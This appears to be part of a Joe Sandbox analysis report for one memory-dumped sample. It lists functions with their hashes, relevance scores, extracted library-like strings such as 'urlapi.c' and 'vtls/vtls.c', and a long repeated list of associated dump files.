                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                                      • API String ID: 0-4201740241
                                                      • Opcode ID: ad16a1114850e922e7b95d9fe25d1373dc15c258a09842ff9b22c22f1a40db25
                                                      • Instruction ID: 5da5838c7fcd0728b63e71d668457994b6acea088c26395adb31a3c6ee8ceb81
                                                      • Opcode Fuzzy Hash: ad16a1114850e922e7b95d9fe25d1373dc15c258a09842ff9b22c22f1a40db25
                                                      • Instruction Fuzzy Hash: 2C62DFB0914741DBD714CF24C490BAAB7E4FF98304F04962EE9898B352E774EA94CB96
                                                      Function 00853A70 Relevance: 6.8, Strings: 5, Instructions: 517COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                                      • API String ID: 0-2839762339
                                                      • Opcode ID: fe624a8217ad1d01dcc3c4eaf9e824ba67213ec3a5f11c91cb27a70905b2a800
                                                      • Instruction ID: b35adae8a80482f313a19e785ccf0aa3beb9cdb8ee0f51fe461fde8ebd72308c
                                                      • Opcode Fuzzy Hash: fe624a8217ad1d01dcc3c4eaf9e824ba67213ec3a5f11c91cb27a70905b2a800
                                                      • Instruction Fuzzy Hash: E902D4B1A083419FD7219F248841B6BB7E4FF54356F14882DED89D7282EB70E94DC792
                                                      Function 0058C900 Relevance: 5.4, Strings: 4, Instructions: 369COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                                      • API String ID: 0-3285806060
                                                      • Opcode ID: 8ce8e0a32b5c2fc2f113366a7a551fcaf7b35a08bec1c4ccafac1022f0169213
                                                      • Instruction ID: af3052d3753cde6e8a354a68255ae474a7c57a1aafe87726392e4a9cfbaf2e02
                                                      • Opcode Fuzzy Hash: 8ce8e0a32b5c2fc2f113366a7a551fcaf7b35a08bec1c4ccafac1022f0169213
                                                      • Instruction Fuzzy Hash: 09D1E272A083418BD724FE28D88177ABFD1BF91314F14892DECD9A7281EB349D44D7A2
                                                      Function 0085CC70 Relevance: 5.4, Strings: 4, Instructions: 351COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$@$gfff$gfff
                                                      • API String ID: 0-2633265772
                                                      • Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                                      • Instruction ID: bb8ac6736c49bac5b165aefe2c569fd3492263f9e5d4396ba19b49dee31f44f2
                                                      • Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                                      • Instruction Fuzzy Hash: 69D1AE71A087098FDB14DE29C88032ABBE2FF94345F18892DEC59CB245D774DD4D8B82
                                                      Function 004F5EB0 Relevance: 4.4, Strings: 3, Instructions: 637COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %$&$urlapi.c
                                                      • API String ID: 0-3891957821
                                                      • Opcode ID: 9c209e80301ebd457d8171f373d4e59ab291be939c18bf568acea33fedbf93a0
                                                      • Instruction ID: 0ec50aea3405516ea3f661d7786a6673304018c47ce2baea36fe870ad885b1a3
                                                      • Opcode Fuzzy Hash: 9c209e80301ebd457d8171f373d4e59ab291be939c18bf568acea33fedbf93a0
                                                      • Instruction Fuzzy Hash: D822DDB0A083496BEB209A249C5177B77D59B91318F1A052FEB86463C3F73DDC49836B
                                                      Function 00861780 Relevance: 4.0, Strings: 2, Instructions: 1506COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $
                                                      • API String ID: 0-227171996
                                                      • Opcode ID: 1c305ac8377cd12def5276ad57bf1751a75764a52cf3b4623f91e673cf8c7cad
                                                      • Instruction ID: 8602adad0888b77c463e21da0698404b82caecccb377d5993fe3507f50d54b6c
                                                      • Opcode Fuzzy Hash: 1c305ac8377cd12def5276ad57bf1751a75764a52cf3b4623f91e673cf8c7cad
                                                      • Instruction Fuzzy Hash: 37E230B1A097418FD720DF28C18475AFBE0FB88758F16896EE885D7361E775E8448F82
                                                      Function 0053A5B0 Relevance: 3.9, Strings: 3, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .12$M 0.$NT L
                                                      • API String ID: 0-1919902838
                                                      • Opcode ID: 3d180e14ccfbb5e1509740e2dcd5fe48f00a78be9d628afd855e69f157923ab9
                                                      • Instruction ID: f3533fb1e92f6a51ef55b576fb30bc98852939c15ebd57f596aa91dcf19101a4
                                                      • Opcode Fuzzy Hash: 3d180e14ccfbb5e1509740e2dcd5fe48f00a78be9d628afd855e69f157923ab9
                                                      • Instruction Fuzzy Hash: 3D51B2746003419BDB11DF20C8D87AA7BE4FF55304F14856DEC889F292E775EA84CB96
                                                      Function 004FDCF0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----$vtls/vtls.c
                                                      • API String ID: 0-424504254
                                                      • Opcode ID: 12d0a2de9e2cf540a2bfba8b673fa7fe6a5660e1405ce0fe23a9d246cbc8b55f
                                                      • Instruction ID: 29eaf1ff96cec501e06777610cc08cb17b8b5fd18a92296653b54686c39cfc3d
                                                      • Opcode Fuzzy Hash: 12d0a2de9e2cf540a2bfba8b673fa7fe6a5660e1405ce0fe23a9d246cbc8b55f
                                                      • Instruction Fuzzy Hash: 40314962E087496BE7261A3D9C95A367AC25FD1318F1C033FE685973D2F65D8C00C29A
                                                      Function 00848BF0 Relevance: 3.0, Strings: 2, Instructions: 512COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #$4
                                                      • API String ID: 0-353776824
                                                      • Opcode ID: 99c4fe66138ccc7c8ea0327574871073371b1a65a9d0730e9ac343e3b6853456
                                                      • Instruction ID: e54d5feef4f7d4a5b2061803e64a1a32e1330afed8189b9f5f923ba5833c94cd
                                                      • Opcode Fuzzy Hash: 99c4fe66138ccc7c8ea0327574871073371b1a65a9d0730e9ac343e3b6853456
                                                      • Instruction Fuzzy Hash: 9A22AD31508746CFC724DF28C4806AAF7E0FF85318F158A2EE899D7391E774A885CB96
                                                      Function 00841BD0 Relevance: 3.0, Strings: 2, Instructions: 463COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #$4
                                                      • API String ID: 0-353776824
                                                      • Opcode ID: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                                      • Instruction ID: a9b74b8e050bc2122f2f2fd23627039ac575cea8d0e869eacbc2c182c2a66e9b
                                                      • Opcode Fuzzy Hash: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                                      • Instruction Fuzzy Hash: 9B12D032A087158BC724CF18C4847ABB7E1FFD4318F198A7DE99997391D774A884CB92
                                                      Function 00854780 Relevance: 2.9, Strings: 2, Instructions: 446COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: H$xn--
                                                      • API String ID: 0-4022323365
                                                      • Opcode ID: 9f3b09a2f871e878a734e49399baae7a0cc6794d1ba2439ecad811d2a15974b9
                                                      • Instruction ID: 25bce43f4dbe5bbf41e059f6262737d4e2144d79f706159fb46b9d9b2717c5ae
                                                      • Opcode Fuzzy Hash: 9f3b09a2f871e878a734e49399baae7a0cc6794d1ba2439ecad811d2a15974b9
                                                      • Instruction Fuzzy Hash: 1FE117326087158BD718DE28D8C062AB7E2FBC4319F189A3DED96C7395E774DC898742
                                                      Function 004E10E6 Relevance: 2.8, Strings: 2, Instructions: 347COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
